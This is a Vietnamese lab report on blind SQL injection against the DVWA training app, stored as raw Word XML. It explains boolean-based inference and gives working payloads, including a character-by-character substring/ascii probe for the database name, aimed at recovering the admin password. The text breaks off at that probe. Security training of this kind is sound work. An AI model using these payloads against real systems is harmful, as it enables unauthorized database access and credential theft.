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67" w:rsidRDefault="008B1567">
      <w:r>
        <w:t xml:space="preserve">BÁO CÁO LAB </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33C0C" w:rsidRDefault="008B1567">
      <w:r>
        <w:t>VIẾT ỨNG DỤNG HỖ TRỢ TẤN CÔNG SQL INJECTION BLIND (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1567" w:rsidRDefault="008B1567">
      <w:r>
        <w:t>TỔNG QUAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1567" w:rsidRPr="008B1567" w:rsidRDefault="008B1567" w:rsidP="008B1567">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8B1567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Blind SQL Injection là một phương pháp thực hiện SQL Injection trong điều kiện các thông tin khai thác được không được trình bày trực</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiếp trên nội dung phản hồi từ </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>database. Blind SQL Injection dựa vào việc sử dụng các mệnh đề điều kiện để thực hiện suy luận thông tin cần khai thác. Cụ thể, Blind SQL Injection sử dụng chính các thông tin cần khai thác làm mệnh đề điều kiện (mệnh đề suy luận), và sử dụng các phương pháp khác nhau để “đánh dấu” trường hợp đúng/sai của mệnh đề đó. Căn cứ vào phương pháp “đánh dấu” trường hợp đúng/sai của mệnh đề quan hệ, ta chia ra hai cách chính thực hiện blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1567" w:rsidRPr="008B1567" w:rsidRDefault="008B1567" w:rsidP="008B1567">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1567">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Dựa vào nội dung phản hồi (response-based)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062545F" w:rsidRDefault="008B1567" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1567">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Dựa vào độ trễ của thời gian phản hồi (time-based) Các phương pháp thực hiện blind SQL Injection có thể áp dụng cho các mô hình khác mà không gặp trở ngại nào, tuy nhiên chi phí thực hiện sẽ luôn cao hơn về mặt thời gian và số truy vấn cần thiết.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062545F" w:rsidRDefault="0062545F" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F26"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062545F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F26"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DVWA SQL Injection Blind – Low Level</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062545F" w:rsidRDefault="0062545F" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F26"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0062545F" w:rsidRDefault="0062545F" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F26"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F26"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Cách thức hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062545F" w:rsidRDefault="0062545F" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0012564F" w:rsidRDefault="0012564F"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Chúng ta không thể trực tiếp lấy dữ liệu trực tiếp từ kết quả trả về sau lện request của ta lên database, nó sẽ trả về kết quả đúng hoặc sai. Trường hợp ở đây là khi ta nhập ID đúng  thì kết quả trả về là: “” còn không là: “”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012564F" w:rsidRDefault="0012564F"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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600"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rsidR="0012564F" w:rsidRDefault="0012564F"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ID chính xác</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012564F" w:rsidRDefault="0012564F"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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="135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rsidR="0012564F" w:rsidRDefault="0012564F"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ID không chính xác</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012564F" w:rsidRDefault="0012564F" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0012564F" w:rsidRDefault="0012564F"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lastRenderedPageBreak/>
        <w:t>Lúc này ta thử thêm điều kiện vào câu truy vấn: “1’ AND 2 = 3 #”</w:t>
      </w:r>
      <w:r w:rsidR="00BA1AEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ở câu điều kiện này ta có thể dễ thấy: vế trái luôn đúng vì id = 1 tồn tại sau lệnh truy vấn đầu tiên là id = 1 có tồn tại trong database, còn vế phải luôn sai vì 2 không thể bằng 3 được. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="00BA1AEA"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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="137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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="00BA1AEA"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Báo không tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="00BA1AEA"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Ta thử câu truy vấn với điều kiện vế phải đúng: “1’ AND 2 = 2”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="00BA1AEA"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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="594360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rsidR="00BA1AEA" w:rsidRDefault="00BA1AEA"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Báo tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="00BA1AEA" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1AEA" w:rsidRDefault="00714678"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Qua đây ta có thể thấy dễ dàng chèn câu truy vấn kiểm tra của ta vào kết hợp với ID tồn tại trong database để tìm kiếm thông tin muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714678" w:rsidRDefault="00714678" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070504C" w:rsidRDefault="00714678"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Kết quả của </w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>“1</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND 2 = 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>“ với đoạn mã trên ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">có thể </w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">kết luận rằng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">đó là </w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">điểm yếu của hệ thống. Điều này là do hệ thống không tìm thấy lỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> bản g</w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>hi trong khi bản ghi đã được đưa và kèm lệnh truy vấn của hệ thống</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Các cuộc tấn công SQL Blind sử dụng các biểu thức boolean như </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Nói cách khác, trang web cung cấp đầu ra (TRUE) bình thường hoặc đầu ra FALSE, chẳng hạn như "</w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>User ID MISSING from the database</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">". Các cuộc tấn công SQL Injection dựa trên các lỗi SQL do hệ thống đưa ra, trong khi các cuộc tấn công SQL Blind được quyết định tùy theo việc trang có phản hồi đúng hay không. Bây giờ chúng </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ta biết</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> rằng trang đích có lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, chúng </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể bắt đầu tấn công. </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Trong cuộc tấn công SQL Injection, chúng ta đã thêm truy vấn UNION vào truy vấn SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Do đó, chúng </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể in dữ liệu nhạy cảm như tên người dùng và mật khẩu trong cơ sở dữ liệu. Tuy nhiên, như bạn có thể thấy từ màn hình của DVWA, </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>kết quả</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> được trả về từ cơ sở dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>từ</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> số được nhập vào </w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>textbox</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> không được phản ánh trên màn hình. Do đó, lệnh UNION không hoạt động đối với Blind SQL Injection. Chúng ta cần tìm một cách khác. Trước hết, như chúng ta đã làm trong cuộc tấn công SQL Injection, chúng ta phải xác định tên của các cơ sở dữ liệu được cài đặt trong hệ thống đích, sau đó xác định tên bảng của cơ sở dữ liệu đã chọn, sau đó xác định tên cột của bảng đã chọn để chúng ta có thể tìm hiểu mật khẩu của quản trị viên. Trong các giai đoạn khám phá này, chúng ta sẽ được</w:t>
      </w:r>
      <w:r w:rsidR="0070504C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> hưởng lợi từ hai hàm SQL. Đầu tiên là hàm ascii (),</w:t>
      </w:r>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> thứ hai là hàm chuỗi con (). Hàm ascii () được sử dụng để trả về mã ascii của ký tự mà nó lấy làm đối số. Hàm chuỗi con () được sử dụng để trả về một phần được chỉ định từ chuỗi mà nó lấy làm đối số. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714678" w:rsidRDefault="00714678" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714678">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đầu tiên, </w:t>
      </w:r>
      <w:r w:rsidR="005C6497">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>hãy khám phá tên cơ sở dữ liệu. Để lấy tên cở sở dữ liệu đang được sử dụng ta có hàm database(). Khi đó câu truy vấn lấy tên cơ sở dữ liệu là: “SELECT DATABASE()”. Câu truy vấn sẽ trả về tên của database hiện tại, nhưng ta không thể hiển thị nó lên được lúc này ta phải dò từng chữ một đến khi kết thúc chuỗi bằng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6497" w:rsidRDefault="005C6497" w:rsidP="0062545F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C6497" w:rsidRDefault="005C6497"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Ký tự thứ nhất: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6497" w:rsidRDefault="005C6497"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r w:rsidR="00E16240" w:rsidRPr="00E16240">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1' AND ascii(lower(substring(</w:t>
      </w:r>
      <w:r w:rsidR="00E16240">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(SELECT DATABASE()), 1,1))) &gt;= 127</w:t>
